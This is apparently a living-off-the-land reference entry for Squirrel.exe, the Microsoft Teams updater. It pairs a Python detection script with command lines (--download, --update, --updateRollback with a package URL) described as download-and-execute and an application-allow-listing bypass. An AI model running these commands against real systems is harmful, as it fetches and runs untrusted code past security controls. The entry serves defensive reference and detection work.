Squirrel.exe

Binary used to update an existing installed NuGet/Squirrel package. Part of the Microsoft Teams installation.


Paths:


Resources:
https://www.youtube.com/watch?v=rOP3hnkj7ls
https://twitter.com/reegun21/status/1144182772623269889
http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12
https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56

Acknowledgement:
Reegun J (OCBC Bank) - @reegun21
Adam - @Hexacorn


Detection:
Update.exe spawned an unknown process
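The detection above, together with a check for the `--download`, `--update` and `--updateRollback` command lines this page lists, can be sketched as a triage pass over process-creation events. This is an added example, not part of the original entry; the event field names, the `EXPECTED_CHILDREN` allow-list, the placeholder paths and the `example.test` host are assumptions.

```python
import re
from pathlib import PureWindowsPath

UPDATER_NAMES = {"squirrel.exe", "update.exe"}               # names used on this page
URL_FLAGS = {"--download", "--update", "--updaterollback"}   # flags listed on this page
# Assumption: the only children the updater should start in this environment.
EXPECTED_CHILDREN = {"teams.exe", "update.exe", "squirrel.exe"}

# A flag, then "=" or whitespace, then an optionally quoted http(s) URL.
FLAG_URL_RE = re.compile(
    r"(?<!\S)(--[a-z]+)(?:=|\s+)[\"']?(https?://[^\s\"']+)", re.IGNORECASE)

def basename(path):
    """Lower-cased file name of a Windows path, on any host OS."""
    return PureWindowsPath(path).name.lower()

def remote_package_args(command_line):
    """(flag, url) pairs where a listed flag is given an http(s) URL."""
    return [(flag, url) for flag, url in FLAG_URL_RE.findall(command_line)
            if flag.lower() in URL_FLAGS]

def triage(events):
    """Return (rule, pid, detail) tuples for process-creation events."""
    findings = []
    for e in events:
        image, parent = basename(e["image"]), basename(e["parent_image"])
        if image in UPDATER_NAMES:
            for flag, url in remote_package_args(e["command_line"]):
                findings.append(("remote-package-url", e["pid"], f"{flag} {url}"))
        if parent in UPDATER_NAMES and image not in EXPECTED_CHILDREN:
            findings.append(("unexpected-child", e["pid"], image))
    return findings

def event(pid, image, command_line, parent_image):
    return {"pid": pid, "image": image, "command_line": command_line,
            "parent_image": parent_image}

# Constructed events with placeholder paths and hosts, not real telemetry.
SAMPLE_EVENTS = [
    event(100, r"C:\apps\demo\Update.exe", 'Update.exe --processStart "Teams.exe"',
          r"C:\Windows\explorer.exe"),
    event(101, r"C:\apps\demo\current\Teams.exe", "Teams.exe", r"C:\apps\demo\Update.exe"),
    event(102, r"C:\apps\demo\Squirrel.exe",
          "squirrel.exe --download http://pkg.example.test/rel/", r"C:\Windows\System32\cmd.exe"),
    event(103, r"C:\apps\demo\Update.exe",
          "Update.exe --updateRollback=https://pkg.example.test/rel/", r"C:\Windows\System32\cmd.exe"),
    event(104, r"C:\apps\demo\unknown.exe", "unknown.exe", r"C:\apps\demo\Update.exe"),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```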



Download

The above binary contacts the URL, looks for a RELEASES file and downloads the NuGet package.
squirrel.exe --download [url to package]
Usecase: Download binary
Privileges required: User
OS: Windows 7 and up with Microsoft Teams installed
Mitre: T1218



AWL bypass

The above binary contacts the URL, looks for a RELEASES file, then downloads and installs the NuGet package.
squirrel.exe --update [url to package]
Usecase: Download and execute binary
Privileges required: User
OS: Windows 7 and up with Microsoft Teams installed
Mitre: T1218



The above binary contacts the URL, looks for a RELEASES file, then downloads and installs the NuGet package.
squirrel.exe --updateRollback=[url to package]
Usecase: Download and execute binary
Privileges required: User
OS: Windows 7 and up with Microsoft Teams installed
Mitre: T1218



Execute

The above binary contacts the URL, looks for a RELEASES file, then downloads and installs the NuGet package.
squirrel.exe --update [url to package]
Usecase: Download and execute binary
Privileges required: User
OS: Windows 7 and up with Microsoft Teams installed
Mitre: T1218



The above binary contacts the URL, looks for a RELEASES file, then downloads and installs the NuGet package.
squirrel.exe --updateRollback=[url to package]
Usecase: Download and execute binary
Privileges required: User
OS: Windows 7 and up with Microsoft Teams installed
Mitre: T1218